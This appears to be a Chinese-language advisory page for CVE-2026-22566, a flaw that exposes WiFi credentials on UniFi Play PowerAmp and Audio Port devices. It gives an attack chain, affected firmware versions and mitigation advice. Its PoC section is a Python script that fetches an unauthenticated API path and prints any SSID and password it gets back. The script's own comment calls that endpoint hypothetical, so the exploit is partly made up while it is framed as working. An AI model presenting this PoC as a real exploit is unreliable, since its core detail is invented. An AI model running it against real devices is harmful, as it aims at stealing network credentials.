CVE-2026-22566 UniFi Play不当访问控制漏洞

漏洞信息

漏洞编号

CVE-2026-22566

漏洞类型

不当访问控制

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

UniFi Play PowerAmp, UniFi Play Audio Port

漏洞概述

CVE-2026-22566是Ubiquiti UniFi Play系列产品中发现的一个高危不当访问控制漏洞。该漏洞允许处于同一网络中的恶意攻击者在无需身份验证的情况下，非法获取设备的WiFi连接凭证。由于受影响设备主要用于音频播放和放大，其网络凭证的泄露可能导致整个局域网的安全防线被突破。攻击者利用该漏洞可轻易获取网络访问权限，进而对内网其他设备发起攻击。该问题主要影响旧版本的UniFi Play PowerAmp和Audio Port固件，用户应尽快关注官方安全公告。

技术细节

该漏洞源于UniFi Play设备在Web接口或API服务中存在的不当访问控制逻辑。具体而言，系统未对获取敏感配置信息的API端点进行严格的身份验证机制校验。根据CVSS 3.1向量（AV:N/AC:L/PR:N/UI:N/S:U），攻击者无需具备任何前置权限，也不需要用户交互，仅需能访问目标设备的网络接口即可发起攻击。在技术实现上，攻击者可以通过构造特定的HTTP GET请求，指向用于存储或同步WiFi凭证的内部接口。由于缺乏访问控制列表（ACL）或中间件拦截，设备直接响应并返回包含SSID和密码（可能为明文或弱加密）的配置数据。这种设计缺陷允许同一网络下的恶意用户直接窃取网络连接凭证，从而绕过网络认证机制，进一步实施中间人攻击或横向渗透。

攻击链分析

STEP 1

侦察

攻击者扫描UniFi Play网络，识别目标设备（UniFi Play PowerAmp或Audio Port）的IP地址。

STEP 2

利用

攻击者向目标设备发送未经授权的HTTP请求至存在缺陷的API端点，利用不当访问控制漏洞绕过身份验证。

STEP 3

数据泄露

目标设备响应请求，返回包含WiFi SSID和密码的敏感配置信息。

STEP 4

后续攻击

攻击者使用获取到的WiFi凭证接入网络，进行横向移动或发起中间人攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# PoC for CVE-2026-22566: Improper Access Control in UniFi Play
# This script attempts to retrieve WiFi credentials without authentication.

def exploit_unifi_play(target_ip):
    # Hypothetical vulnerable endpoint based on the vulnerability description
    # Attackers can access config data without auth due to improper access control
    url = f"http://{target_ip}/api/v1/network/wifi/config"
    
    headers = {
        "User-Agent": "Mozilla/5.0 (Compatible; CVE-2026-22566-Scanner)",
        "Accept": "application/json"
    }

    print(f"[*] Attempting to retrieve credentials from {target_ip}...")

    try:
        # Send request without authentication tokens
        response = requests.get(url, headers=headers, timeout=10)

        if response.status_code == 200:
            data = response.json()
            print("[+] Exploit Successful! Sensitive data retrieved:")
            print(json.dumps(data, indent=4))
            
            # Extract specific fields if they exist
            if 'wifi_ssid' in data and 'wifi_password' in data:
                print(f"[+] SSID: {data['wifi_ssid']}")
                print(f"[+] Password: {data['wifi_password']}")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            print(f"[-] The device might be patched or not vulnerable.")

    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}")
    except json.JSONDecodeError:
        print("[-] Response was not valid JSON.")

if __name__ == "__main__":
    # Replace with the actual IP address of the target device
    target = "192.168.1.100"
    exploit_unifi_play(target)

影响范围

UniFi Play PowerAmp <= 1.0.35

UniFi Play Audio Port <= 1.0.24

防御指南

临时缓解措施

如果无法立即升级固件，建议将受影响的UniFi Play设备放置在隔离的VLAN（虚拟局域网）中，限制其与其他关键设备的通信。同时，应更改WiFi网络的密码，以防已被泄露的凭证被持续利用，并监控网络日志中是否有异常的访问行为。